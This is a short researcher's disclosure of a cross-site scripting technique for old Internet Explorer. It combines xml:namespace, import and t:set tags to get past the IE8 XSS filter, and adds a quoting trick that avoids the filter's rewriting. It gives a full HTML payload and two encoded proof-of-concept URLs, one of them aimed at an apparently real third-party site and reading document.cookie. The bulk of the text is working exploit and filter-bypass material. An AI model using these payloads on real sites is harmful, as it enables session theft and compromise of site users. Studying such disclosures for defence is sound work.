Note: IE 10 have fixed this issue,and IE8... ------------------------------------------------- 1. a <?import ... > tag can also be written as a <import ...> tag. <html> <body> <div> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;"> </div> </body> </html> the code above will execute script fragment in "to" attribute. Furthermore, we found this xss vector contructed from the three tags (<xml> <import> & <t:set ...>) can bypass the IE8 xss filter. ------------------------------------------------- POC1: use <import ...> http://xsst.sinaapp.com/example/1-1.php?page=<div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;> while using <?import ...> will trigger the xss filter to intercept our code. 2. Our code should start with ">, when we encounter the case like : <input type="text" value="{parameter under controlled}">. The "> will trigger the xss filter, and it will replace some words like 'namespace' and 'attributeName' in our code. My friend @jackmasa (https://twitter.com/jackmasa)(@Sogili in Wooyun.org) gave me a trick to solve the problem: "x> (x represents any letter) cannot trigger the filter. ------------------------------------------------- POC2: http://www.53kf.com/product.php?arg=&search="id=><div/id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;> That's all. Thanks for help from my friend jackmasa (@Sogili in Wooyun.org). Author: Gainover Group: PKAV .net & Wooyun.org